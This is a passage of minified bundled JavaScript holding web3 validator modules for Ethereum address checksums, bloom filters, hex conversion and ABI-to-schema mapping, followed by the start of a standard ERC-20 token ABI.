                    "string",
                    "address",
                    "tuple"
                ];
            },
            3637: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validator = void 0;
                const n = r(7985);
                t.validator = new n.Web3Validator;
            },
            356: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3ValidatorError = void 0;
                const n = r(5071), i = r(2102), o = (e)=>e.message && e.instancePath && e.params && !(0, i.isNullish)(e.params.value) ? `value "${e.params.value}" at "${e.instancePath}" ${e.message}` : e.message && e.instancePath ? `value at "${e.instancePath}" ${e.message}` : e.instancePath ? `value at "${e.instancePath}" caused unspecified error` : e.message ? e.message : "unspecified error";
                class s extends n.BaseWeb3Error {
                    constructor(e){
                        super(), this.code = n.ERR_VALIDATION, this.errors = e, super.message = `Web3 validator found ${e.length} error[s]:\n${this._compileErrors().join("\n")}`;
                    }
                    _compileErrors() {
                        return this.errors.map(o);
                    }
                }
                t.Web3ValidatorError = s;
            },
            2677: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const n = r(2681), i = r(6660), o = r(5191), s = r(4416), a = r(3921), u = r(5164), c = r(7420), l = r(6378), d = {
                    address: (e)=>(0, n.isAddress)(e),
                    bloom: (e)=>(0, o.isBloom)(e),
                    blockNumber: (e)=>(0, i.isBlockNumber)(e),
                    blockTag: (e)=>(0, i.isBlockTag)(e),
                    blockNumberOrTag: (e)=>(0, i.isBlockNumberOrTag)(e),
                    bool: (e)=>(0, s.isBoolean)(e),
                    bytes: (e)=>(0, a.isBytes)(e),
                    filter: (e)=>(0, u.isFilterObject)(e),
                    hex: (e)=>(0, c.isHexStrict)(e),
                    uint: (e)=>(0, l.isUInt)(e),
                    int: (e)=>(0, l.isInt)(e),
                    number: (e)=>(0, l.isNumber)(e),
                    string: (e)=>(0, c.isString)(e)
                };
                for(let e = 3; e <= 8; e += 1){
                    const t = 2 ** e;
                    d[`int${t}`] = (e)=>(0, l.isInt)(e, {
                            bitSize: t
                        }), d[`uint${t}`] = (e)=>(0, l.isUInt)(e, {
                            bitSize: t
                        });
                }
                for(let e = 1; e <= 32; e += 1)d[`bytes${e}`] = (t)=>(0, a.isBytes)(t, {
                        size: e
                    });
                t.default = d;
            },
            7345: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                }, s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.utils = void 0, o(r(7985), t), o(r(3637), t), o(r(5421), t), t.utils = s(r(8171)), o(r(356), t), o(r(1438), t), o(r(1851), t);
            },
            5421: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8171: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hexToUint8Array = t.uint8ArrayToHexString = t.padLeft = t.numberToHex = t.hexToNumber = t.codePointToInt = t.transformJsonDataToAbiFormat = t.fetchArrayElement = t.ethAbiToJsonSchema = t.abiSchemaToJsonSchema = t.parseBaseType = void 0;
                const n = r(5071), i = r(1438), o = r(1283), s = r(7420), a = r(356), u = [
                    "hex",
                    "number",
                    "blockNumber",
                    "blockNumberOrTag",
                    "filter",
                    "bloom"
                ];
                t.parseBaseType = (e)=>{
                    let t, r = e.replace(/ /, ""), n = !1, o = [];
                    if (e.includes("[") && (r = r.slice(0, r.indexOf("[")), o = [
                        ...e.matchAll(/(?:\[(\d*)\])/g)
                    ].map((e)=>parseInt(e[1], 10)).map((e)=>Number.isNaN(e) ? -1 : e), n = o.length > 0), i.VALID_ETH_BASE_TYPES.includes(r)) return {
                        baseType: r,
                        isArray: n,
                        baseTypeSize: t,
                        arraySizes: o
                    };
                    if (r.startsWith("int")) t = parseInt(r.substring(3), 10), r = "int";
                    else if (r.startsWith("uint")) t = parseInt(e.substring(4), 10), r = "uint";
                    else {
                        if (!r.startsWith("bytes")) return {
                            baseType: void 0,
                            isArray: !1,
                            baseTypeSize: void 0,
                            arraySizes: o
                        };
                        t = parseInt(r.substring(5), 10), r = "bytes";
                    }
                    return {
                        baseType: r,
                        isArray: n,
                        baseTypeSize: t,
                        arraySizes: o
                    };
                };
                const c = (e, r = {})=>{
                    if (Object.keys(r).includes("type")) throw new a.Web3ValidatorError([
                        {
                            keyword: "eth",
                            message: 'Either "eth" or "type" can be presented in schema',
                            params: {
                                eth: e
                            },
                            instancePath: "",
                            schemaPath: ""
                        }
                    ]);
                    const { baseType: n, baseTypeSize: i } = (0, t.parseBaseType)(e);
                    if (!n && !u.includes(e)) throw new a.Web3ValidatorError([
                        {
                            keyword: "eth",
                            message: `Eth data type "${e}" is not valid`,
                            params: {
                                eth: e
                            },
                            instancePath: "",
                            schemaPath: ""
                        }
                    ]);
                    if (n) {
                        if ("tuple" === n) throw new Error('"tuple" type is not implemented directly.');
                        return {
                            format: `${n}${null != i ? i : ""}`,
                            required: !0
                        };
                    }
                    return e ? {
                        format: e,
                        required: !0
                    } : {};
                };
                t.abiSchemaToJsonSchema = (e, r = "/0")=>{
                    const n = {
                        type: "array",
                        items: [],
                        maxItems: e.length,
                        minItems: e.length
                    };
                    for (const [i, s] of e.entries()){
                        let e, a, u = [];
                        (0, o.isAbiParameterSchema)(s) ? (e = s.type, a = s.name, u = s.components) : "string" == typeof s ? (e = s, a = `${r}/${i}`) : Array.isArray(s) && (s[0] && "string" == typeof s[0] && s[0].startsWith("tuple") && !Array.isArray(s[0]) && s[1] && Array.isArray(s[1]) ? (e = s[0], a = `${r}/${i}`, u = s[1]) : (e = "tuple", a = `${r}/${i}`, u = s));
                        const { baseType: l, isArray: d, arraySizes: h } = (0, t.parseBaseType)(e);
                        let f, p = n;
                        for(let e = h.length - 1; e > 0; e -= 1)f = {
                            type: "array",
                            items: [],
                            maxItems: h[e],
                            minItems: h[e]
                        }, h[e] < 0 && (delete f.maxItems, delete f.minItems), p.items = f, p = f;
                        if ("tuple" !== l || d) {
                            if ("tuple" === l && d) {
                                const e = h[0], r = {
                                    $id: a,
                                    type: "array",
                                    items: (0, t.abiSchemaToJsonSchema)(u, a),
                                    maxItems: e,
                                    minItems: e
                                };
                                e < 0 && (delete r.maxItems, delete r.minItems), p.items.push(r);
                            } else if (d) {
                                const e = h[0], t = {
                                    type: "array",
                                    $id: a,
                                    items: c(String(l)),
                                    minItems: e,
                                    maxItems: e
                                };
                                e < 0 && (delete t.maxItems, delete t.minItems), p.items.push(t);
                            } else Array.isArray(p.items) ? p.items.push(Object.assign({
                                $id: a
                            }, c(e))) : p.items.items.push(Object.assign({
                                $id: a
                            }, c(e)));
                        } else {
                            const e = (0, t.abiSchemaToJsonSchema)(u, a);
                            e.$id = a, p.items.push(e);
                        }
                    }
                    return n;
                }, t.ethAbiToJsonSchema = (e)=>(0, t.abiSchemaToJsonSchema)(e), t.fetchArrayElement = (e, r)=>1 === r ? e : (0, t.fetchArrayElement)(e[0], r - 1), t.transformJsonDataToAbiFormat = (e, r, n)=>{
                    const i = [];
                    for (const [s, a] of e.entries()){
                        let e, u, c = [];
                        (0, o.isAbiParameterSchema)(a) ? (e = a.type, u = a.name, c = a.components) : "string" == typeof a ? e = a : Array.isArray(a) && (a[1] && Array.isArray(a[1]) ? (e = a[0], c = a[1]) : (e = "tuple", c = a));
                        const { baseType: l, isArray: d, arraySizes: h } = (0, t.parseBaseType)(e), f = Array.isArray(r) ? r[s] : r[u];
                        if ("tuple" !== l || d) {
                            if ("tuple" === l && d) {
                                const e = [];
                                for (const r of f)if (h.length > 1) {
                                    const i = (0, t.fetchArrayElement)(r, h.length - 1), o = [];
                                    for (const e of i)o.push((0, t.transformJsonDataToAbiFormat)(c, e, n));
                                    e.push(o);
                                } else e.push((0, t.transformJsonDataToAbiFormat)(c, r, n));
                                i.push(e);
                            } else i.push(f);
                        } else i.push((0, t.transformJsonDataToAbiFormat)(c, f, n));
                    }
                    return (n = null != n ? n : []).push(...i), n;
                }, t.codePointToInt = (e)=>{
                    if (e >= 48 && e <= 57) return e - 48;
                    if (e >= 65 && e <= 70) return e - 55;
                    if (e >= 97 && e <= 102) return e - 87;
                    throw new Error(`Invalid code point: ${e}`);
                }, t.hexToNumber = (e)=>{
                    if (!(0, s.isHexStrict)(e)) throw new Error("Invalid hex string");
                    const [t, r] = e.startsWith("-") ? [
                        !0,
                        e.slice(1)
                    ] : [
                        !1,
                        e
                    ], n = BigInt(r);
                    return n > Number.MAX_SAFE_INTEGER ? t ? -n : n : n < Number.MIN_SAFE_INTEGER ? n : t ? -1 * Number(n) : Number(n);
                }, t.numberToHex = (e)=>{
                    if (("number" == typeof e || "bigint" == typeof e) && e < 0) return `-0x${e.toString(16).slice(1)}`;
                    if (("number" == typeof e || "bigint" == typeof e) && e >= 0) return `0x${e.toString(16)}`;
                    if ("string" == typeof e && (0, s.isHexStrict)(e)) {
                        const [t, r] = e.startsWith("-") ? [
                            !0,
                            e.slice(1)
                        ] : [
                            !1,
                            e
                        ];
                        return `${t ? "-" : ""}0x${r.split(/^(-)?0(x|X)/).slice(-1)[0].replace(/^0+/, "").toLowerCase()}`;
                    }
                    if ("string" == typeof e && !(0, s.isHexStrict)(e)) return (0, t.numberToHex)(BigInt(e));
                    throw new n.InvalidNumberError(e);
                }, t.padLeft = (e, r, n = "0")=>{
                    if ("string" == typeof e && !(0, s.isHexStrict)(e)) return e.padStart(r, n);
                    const i = "string" == typeof e && (0, s.isHexStrict)(e) ? e : (0, t.numberToHex)(e), [o, a] = i.startsWith("-") ? [
                        "-0x",
                        i.slice(3)
                    ] : [
                        "0x",
                        i.slice(2)
                    ];
                    return `${o}${a.padStart(r, n)}`;
                }, t.uint8ArrayToHexString = function(e) {
                    let t = "0x";
                    for (const r of e){
                        const e = r.toString(16);
                        t += 1 === e.length ? `0${e}` : e;
                    }
                    return t;
                }, t.hexToUint8Array = function(e) {
                    let t;
                    if (t = e.toLowerCase().startsWith("0x") ? e.slice(2) : e, t.length % 2 != 0) throw new n.InvalidBytesError(`hex string has odd length: ${e}`);
                    const r = new Uint8Array(Math.ceil(t.length / 2));
                    for(let e = 0; e < r.length; e += 1){
                        const n = parseInt(t.substring(2 * e, 2 * e + 2), 16);
                        r[e] = n;
                    }
                    return r;
                };
            },
            1283: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isAbiParameterSchema = void 0, t.isAbiParameterSchema = (e)=>"object" == typeof e && "type" in e && "name" in e;
            },
            2681: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isAddress = t.checkAddressCheckSum = void 0;
                const n = r(4488), i = r(7737), o = r(8171), s = r(7420);
                t.checkAddressCheckSum = (e)=>{
                    if (!/^(0x)?[0-9a-f]{40}$/i.test(e)) return !1;
                    const t = e.slice(2), r = (0, i.utf8ToBytes)(t.toLowerCase()), s = (0, o.uint8ArrayToHexString)((0, n.keccak256)(r)).slice(2);
                    for(let e = 0; e < 40; e += 1)if (parseInt(s[e], 16) > 7 && t[e].toUpperCase() !== t[e] || parseInt(s[e], 16) <= 7 && t[e].toLowerCase() !== t[e]) return !1;
                    return !0;
                }, t.isAddress = (e, r = !0)=>{
                    if ("string" != typeof e && !(e instanceof Uint8Array)) return !1;
                    let n;
                    return n = e instanceof Uint8Array ? (0, o.uint8ArrayToHexString)(e) : "string" != typeof e || (0, s.isHexStrict)(e) || e.toLowerCase().startsWith("0x") ? e : `0x${e}`, !!/^(0x)?[0-9a-f]{40}$/i.test(n) && (!(!/^(0x|0X)?[0-9a-f]{40}$/.test(n) && !/^(0x|0X)?[0-9A-F]{40}$/.test(n)) || !r || (0, t.checkAddressCheckSum)(n));
                };
            },
            6660: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBlockNumberOrTag = t.isBlockTag = t.isBlockNumber = void 0;
                const n = r(9970), i = r(6378);
                t.isBlockNumber = (e)=>(0, i.isUInt)(e), t.isBlockTag = (e)=>Object.values(n.BlockTags).includes(e), t.isBlockNumberOrTag = (e)=>(0, t.isBlockTag)(e) || (0, t.isBlockNumber)(e);
            },
            5191: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isContractAddressInBloom = t.isUserEthereumAddressInBloom = t.isInBloom = t.isBloom = void 0;
                const n = r(4488), i = r(8171), o = r(2681), s = r(7420);
                t.isBloom = (e)=>!("string" != typeof e || !/^(0x)?[0-9a-f]{512}$/i.test(e) || !/^(0x)?[0-9a-f]{512}$/.test(e) && !/^(0x)?[0-9A-F]{512}$/.test(e)), t.isInBloom = (e, r)=>{
                    if ("string" == typeof r && !(0, s.isHexStrict)(r)) return !1;
                    if (!(0, t.isBloom)(e)) return !1;
                    const o = "string" == typeof r ? (0, i.hexToUint8Array)(r) : r, a = (0, i.uint8ArrayToHexString)((0, n.keccak256)(o)).slice(2);
                    for(let t = 0; t < 12; t += 4){
                        const r = (parseInt(a.slice(t, t + 2), 16) << 8) + parseInt(a.slice(t + 2, t + 4), 16) & 2047, n = 1 << r % 4;
                        if (((0, i.codePointToInt)(e.charCodeAt(e.length - 1 - Math.floor(r / 4))) & n) !== n) return !1;
                    }
                    return !0;
                }, t.isUserEthereumAddressInBloom = (e, r)=>{
                    if (!(0, t.isBloom)(e)) return !1;
                    if (!(0, o.isAddress)(r)) return !1;
                    const n = (0, i.padLeft)(r, 64);
                    return (0, t.isInBloom)(e, n);
                }, t.isContractAddressInBloom = (e, r)=>!!(0, t.isBloom)(e) && !!(0, o.isAddress)(r) && (0, t.isInBloom)(e, r);
            },
            4416: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBoolean = void 0;
                const n = r(7420);
                t.isBoolean = (e)=>!(![
                        "number",
                        "string",
                        "boolean"
                    ].includes(typeof e) || "boolean" != typeof e && ("string" != typeof e || (0, n.isHexStrict)(e) ? "string" == typeof e && (0, n.isHexStrict)(e) ? "0x1" !== e && "0x0" !== e : "number" != typeof e || 1 !== e && 0 !== e : "1" !== e && "0" !== e));
            },
            3921: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBytes = t.isUint8Array = void 0;
                const n = r(8171), i = r(7420);
                t.isUint8Array = (e)=>e instanceof Uint8Array, t.isBytes = (e, t = {
                    abiType: "bytes"
                })=>{
                    if (!("string" == typeof e || Array.isArray(e) || e instanceof Uint8Array)) return !1;
                    if ("string" == typeof e && (0, i.isHexStrict)(e) && e.startsWith("-")) return !1;
                    if ("string" == typeof e && !(0, i.isHexStrict)(e)) return !1;
                    let r;
                    if ("string" == typeof e) {
                        if (e.length % 2 != 0) return !1;
                        r = (0, n.hexToUint8Array)(e);
                    } else if (Array.isArray(e)) {
                        if (e.some((e)=>e < 0 || e > 255 || !Number.isInteger(e))) return !1;
                        r = new Uint8Array(e);
                    } else r = e;
                    if (null == t ? void 0 : t.abiType) {
                        const { baseTypeSize: e } = (0, n.parseBaseType)(t.abiType);
                        return !e || r.length === e;
                    }
                    return !(null == t ? void 0 : t.size) || r.length === (null == t ? void 0 : t.size);
                };
            },
            1478: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isValidEthBaseType = void 0;
                const n = r(8171);
                t.isValidEthBaseType = (e)=>{
                    const { baseType: t, baseTypeSize: r } = (0, n.parseBaseType)(e);
                    return !!t && (t === e || ("int" !== t && "uint" !== t || !r || r <= 256 && r % 8 == 0) && ("bytes" !== t || !r || r >= 1 && r <= 32));
                };
            },
            5164: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isFilterObject = void 0;
                const n = r(2681), i = r(6660), o = r(2102), s = r(5702);
                t.isFilterObject = (e)=>{
                    const t = [
                        "fromBlock",
                        "toBlock",
                        "address",
                        "topics",
                        "blockHash"
                    ];
                    if ((0, o.isNullish)(e) || "object" != typeof e) return !1;
                    if (!Object.keys(e).every((e)=>t.includes(e))) return !1;
                    if (!(0, o.isNullish)(e.fromBlock) && !(0, i.isBlockNumberOrTag)(e.fromBlock) || !(0, o.isNullish)(e.toBlock) && !(0, i.isBlockNumberOrTag)(e.toBlock)) return !1;
                    if (!(0, o.isNullish)(e.address)) {
                        if (Array.isArray(e.address)) {
                            if (!e.address.every((e)=>(0, n.isAddress)(e))) return !1;
                        } else if (!(0, n.isAddress)(e.address)) return !1;
                    }
                    return !(!(0, o.isNullish)(e.topics) && !e.topics.every((e)=>!!(0, o.isNullish)(e) || (Array.isArray(e) ? e.every((e)=>(0, s.isTopic)(e)) : !!(0, s.isTopic)(e))));
                };
            },
            1851: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(2681), t), i(r(6660), t), i(r(5191), t), i(r(4416), t), i(r(3921), t), i(r(1478), t), i(r(5164), t), i(r(6378), t), i(r(7420), t), i(r(5702), t), i(r(2102), t);
            },
            6378: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isNumber = t.isInt = t.isUInt = t.isBigInt = void 0;
                const n = r(8171), i = r(7420);
                t.isBigInt = (e)=>"bigint" == typeof e, t.isUInt = (e, t = {
                    abiType: "uint"
                })=>{
                    if (![
                        "number",
                        "string",
                        "bigint"
                    ].includes(typeof e) || "string" == typeof e && 0 === e.length) return !1;
                    let r;
                    if (null == t ? void 0 : t.abiType) {
                        const { baseTypeSize: e } = (0, n.parseBaseType)(t.abiType);
                        e && (r = e);
                    } else t.bitSize && (r = t.bitSize);
                    const o = BigInt(2) ** BigInt(null != r ? r : 256) - BigInt(1);
                    try {
                        const t = "string" == typeof e && (0, i.isHexStrict)(e) ? BigInt((0, n.hexToNumber)(e)) : BigInt(e);
                        return t >= 0 && t <= o;
                    } catch (e) {
                        return !1;
                    }
                }, t.isInt = (e, t = {
                    abiType: "int"
                })=>{
                    if (![
                        "number",
                        "string",
                        "bigint"
                    ].includes(typeof e)) return !1;
                    if ("number" == typeof e && e > Number.MAX_SAFE_INTEGER) return !1;
                    let r;
                    if (null == t ? void 0 : t.abiType) {
                        const { baseTypeSize: e, baseType: i } = (0, n.parseBaseType)(t.abiType);
                        if ("int" !== i) return !1;
                        e && (r = e);
                    } else t.bitSize && (r = t.bitSize);
                    const o = BigInt(2) ** BigInt((null != r ? r : 256) - 1), s = BigInt(-1) * BigInt(2) ** BigInt((null != r ? r : 256) - 1);
                    try {
                        const t = "string" == typeof e && (0, i.isHexStrict)(e) ? BigInt((0, n.hexToNumber)(e)) : BigInt(e);
                        return t >= s && t <= o;
                    } catch (e) {
                        return !1;
                    }
                }, t.isNumber = (e)=>!!(0, t.isInt)(e) || !("string" != typeof e || !/[0-9.]/.test(e) || e.indexOf(".") !== e.lastIndexOf(".")) || "number" == typeof e;
            },
            2102: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isObject = t.isNullish = void 0;
                const n = r(9970);
                t.isNullish = (e)=>null == e, t.isObject = (e)=>!("object" != typeof e || (0, t.isNullish)(e) || Array.isArray(e) || e instanceof n.TypedArray);
            },
            7420: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateNoLeadingZeroes = t.isHexPrefixed = t.isHexString32Bytes = t.isHexString8Bytes = t.isHex = t.isHexString = t.isHexStrict = t.isString = void 0, t.isString = (e)=>"string" == typeof e, t.isHexStrict = (e)=>"string" == typeof e && /^((-)?0x[0-9a-f]+|(0x))$/i.test(e), t.isHexString = function(e, t) {
                    return !("string" != typeof e || !e.match(/^0x[0-9A-Fa-f]*$/) || void 0 !== t && t > 0 && e.length !== 2 + 2 * t);
                }, t.isHex = (e)=>"number" == typeof e || "bigint" == typeof e || "string" == typeof e && /^((-0x|0x|-)?[0-9a-f]+|(0x))$/i.test(e), t.isHexString8Bytes = (e, r = !0)=>r ? (0, t.isHexStrict)(e) && 18 === e.length : (0, t.isHex)(e) && 16 === e.length, t.isHexString32Bytes = (e, r = !0)=>r ? (0, t.isHexStrict)(e) && 66 === e.length : (0, t.isHex)(e) && 64 === e.length, t.isHexPrefixed = function(e) {
                    if ("string" != typeof e) throw new Error("[isHexPrefixed] input must be type 'string', received type " + typeof e);
                    return e.startsWith("0x");
                }, t.validateNoLeadingZeroes = function(e) {
                    for (const [t, r] of Object.entries(e))if (void 0 !== r && r.length > 0 && 0 === r[0]) throw new Error(`${t} cannot have leading zeroes, received: ${r.toString()}`);
                };
            },
            5702: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isTopicInBloom = t.isTopic = void 0;
                const n = r(5191);
                t.isTopic = (e)=>!("string" != typeof e || !/^(0x)?[0-9a-f]{64}$/i.test(e) || !/^(0x)?[0-9a-f]{64}$/.test(e) && !/^(0x)?[0-9A-F]{64}$/.test(e)), t.isTopicInBloom = (e, r)=>!!(0, n.isBloom)(e) && !!(0, t.isTopic)(r) && (0, n.isInBloom)(e, r);
            },
            1714: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Validator = void 0;
                const i = r(7737), o = r(7640), s = n(r(772)), a = n(r(2677)), u = r(356);
                class c {
                    constructor(){
                        this._schemas = new Map;
                    }
                    static factory() {
                        return c.validatorInstance || (c.validatorInstance = new c), c.validatorInstance;
                    }
                    getSchema(e) {
                        return this._schemas.get(e);
                    }
                    addSchema(e, t) {
                        this._schemas.set(e, this.createValidator(t));
                    }
                    createValidator(e) {
                        return (0, s.default)(e, {
                            formats: a.default,
                            greedy: !0,
                            verbose: !0,
                            additionalProperties: !1
                        });
                    }
                    validate(e, t, r) {
                        const n = this.getOrCreateValidator(e);
                        if (!n(t)) {
                            const i = this.convertErrors(n.errors, e, t);
                            if (i) {
                                if (null == r ? void 0 : r.silent) return i;
                                throw new u.Web3ValidatorError(i);
                            }
                        }
                    }
                    convertErrors(e, t, r) {
                        if (e && Array.isArray(e) && e.length > 0) return e.map((e)=>{
                            let n, i, o, s;
                            s = Array.isArray(e.schemaPath) ? e.schemaPath.slice(1).join("/") : "";
                            const { field: a } = e, u = s || ((null == a ? void 0 : a.length) >= 4 ? `${a.slice(4).replace(/\"|\[|\]/g, "")}` : "/"), c = u ? `/${u}` : "";
                            if ("has less items than allowed" === (null == e ? void 0 : e.message)) {
                                const e = this.getObjectValueByPath(t, s);
                                e.minItems && (i = "minItems", s = `${s}/minItems`, o = {
                                    limit: e.minItems
                                }, n = `must NOT have fewer than ${e.minItems} items`);
                            } else if ("has more items than allowed" === (null == e ? void 0 : e.message)) {
                                const e = this.getObjectValueByPath(t, s);
                                e.maxItems && (i = "maxItems", s = `${s}/maxItems`, o = {
                                    limit: e.maxItems
                                }, n = `must NOT have more than ${e.maxItems} items`);
                            } else if ((null == e ? void 0 : e.message.startsWith("must be")) && (null == e ? void 0 : e.message.endsWith("format"))) {
                                const t = null == e ? void 0 : e.message.split(" ")[2];
                                t && (n = `must pass "${t}" validation`);
                            }
                            const l = this.getObjectValueByPath(r, c);
                            return {
                                keyword: null != i ? i : e.field,
                                instancePath: c,
                                schemaPath: `#${s}`,
                                params: null != o ? o : {
                                    value: l
                                },
                                message: null != n ? n : e.message
                            };
                        });
                    }
                    getOrCreateValidator(e) {
                        const t = c.getKey(e);
                        let r = this.getSchema(t);
                        return r || (this.addSchema(t, e), r = this.getSchema(t)), r;
                    }
                    static getKey(e) {
                        return (0, i.toHex)((0, o.blake2b)((0, i.utf8ToBytes)(JSON.stringify(e))));
                    }
                    getObjectValueByPath(e, t, r) {
                        try {
                            if ("object" != typeof e) throw new Error("Invalid input object");
                            if ("string" != typeof t) throw new Error("Invalid JSON pointer");
                            const n = t.split("/");
                            if (![
                                "",
                                "#"
                            ].includes(n.shift())) throw new Error("Invalid JSON pointer");
                            if (0 === n.length) return e;
                            let i = e;
                            for (const e of n){
                                if ("string" != typeof e) throw new Error("Invalid JSON pointer");
                                r && r.push(i);
                                const t = this.untilde(e);
                                if ("object" != typeof i) return;
                                if (!Object.prototype.hasOwnProperty.call(i, t)) return;
                                i = i[t];
                            }
                            return i;
                        } catch (e) {
                            return "";
                        }
                    }
                    untilde(e) {
                        return e.includes("~") ? e.replace(/~[01]/g, (e)=>{
                            switch(e){
                                case "~1":
                                    return "/";
                                case "~0":
                                    return "~";
                                default:
                                    throw new Error("Unreachable");
                            }
                        }) : e;
                    }
                }
                t.Validator = c;
            },
            7985: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Validator = void 0;
                const n = r(1714), i = r(8171), o = r(356);
                t.Web3Validator = class {
                    constructor(){
                        this._validator = n.Validator.factory();
                    }
                    validateJSONSchema(e, t, r) {
                        return this._validator.validate(e, t, r);
                    }
                    validate(e, t, r = {
                        silent: !1
                    }) {
                        var n, s;
                        const a = (0, i.ethAbiToJsonSchema)(e);
                        if (!Array.isArray(a.items) || 0 !== (null === (n = a.items) || void 0 === n ? void 0 : n.length) || 0 !== t.length) {
                            if (Array.isArray(a.items) && 0 === (null === (s = a.items) || void 0 === s ? void 0 : s.length) && 0 !== t.length) throw new o.Web3ValidatorError([
                                {
                                    instancePath: "/0",
                                    schemaPath: "/",
                                    keyword: "required",
                                    message: "empty schema against data can not be validated",
                                    params: t
                                }
                            ]);
                            return this._validator.validate(a, t, r);
                        }
                    }
                };
            }
        }, t = {};
        function r(n) {
            var i = t[n];
            if (void 0 !== i) return i.exports;
            var o = t[n] = {
                id: n,
                loaded: !1,
                exports: {}
            };
            return e[n].call(o.exports, o, o.exports, r), o.loaded = !0, o.exports;
        }
        r.amdO = {}, r.n = (e)=>{
            var t = e && e.__esModule ? ()=>e.default : ()=>e;
            return r.d(t, {
                a: t
            }), t;
        }, r.d = (e, t)=>{
            for(var n in t)r.o(t, n) && !r.o(e, n) && Object.defineProperty(e, n, {
                enumerable: !0,
                get: t[n]
            });
        }, r.g = function() {
            if ("object" == typeof globalThis) return globalThis;
            try {
                return this || new Function("return this")();
            } catch (e) {
                if ("object" == typeof window) return window;
            }
        }(), r.o = (e, t)=>Object.prototype.hasOwnProperty.call(e, t), r.r = (e)=>{
            "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                value: "Module"
            }), Object.defineProperty(e, "__esModule", {
                value: !0
            });
        }, r.nmd = (e)=>(e.paths = [], e.children || (e.children = []), e);
        var n = r(9375);
        return n.default;
    })());


var $9975c64ce2e299cc$exports = {};
$9975c64ce2e299cc$exports = JSON.parse('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"